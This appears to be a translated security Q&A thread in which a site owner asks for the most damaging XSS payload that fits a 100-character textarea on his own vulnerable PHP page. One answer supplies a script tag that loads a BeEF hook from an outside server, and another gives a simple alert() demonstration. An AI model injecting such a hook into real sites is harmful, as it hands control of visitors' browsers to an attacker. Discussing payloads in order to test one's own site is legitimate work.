¿Cuál es la mejor explotación de XSS en 100 caracteres? [cerrado]

-5

Encontré un script php vulnerable en mi sitio web. La secuencia de comandos permite una entrada de usuario (textarea), que no está codificada por htmlspecialchars (). Por lo tanto, es posible agregar código html y javascript. La longitud máxima permitida de este área de texto es de 100 caracteres. ¿Cuál sería el peor o mejor aprovechamiento de para aplicar en esta vulnerabilidad?

Editar: la limitación de caracteres es forzada en el lado del servidor por rtrim.

    
pregunta zarathustra 19.11.2014 - 20:00
fuente

2 respuestas

2

Esta pregunta invita a obtener respuestas subjetivas, pero yo diría que la carga útil:

<script src=http://1.1.1.1:3000/hook.js></script>

Junto con el BeEF exploit framework sería el mayor daño que podría hacer porque proporciona una manera de lanzar una serie de otros ataques.

Obviamente, reemplazaría la dirección IP que proporcioné con una propia que apunta a una instancia de BeEF.

Otra cosa a tener en cuenta: ¿se puede pasar por alto el límite de 100 caracteres? Si este límite se aplica en el lado del cliente, en realidad no se aplica en absoluto.

    
respondido por el Abe Miessler 19.11.2014 - 20:08
fuente
1

Un exploit fácil es simplemente:

<script>alert("Hacked!");</script>

Los cuadros alert similares se usan a menudo como una demostración de un exploit XSS porque son muy fáciles de ver y entender.

    
respondido por el CoverosGene 19.11.2014 - 20:04
fuente

Lea otras preguntas en las etiquetas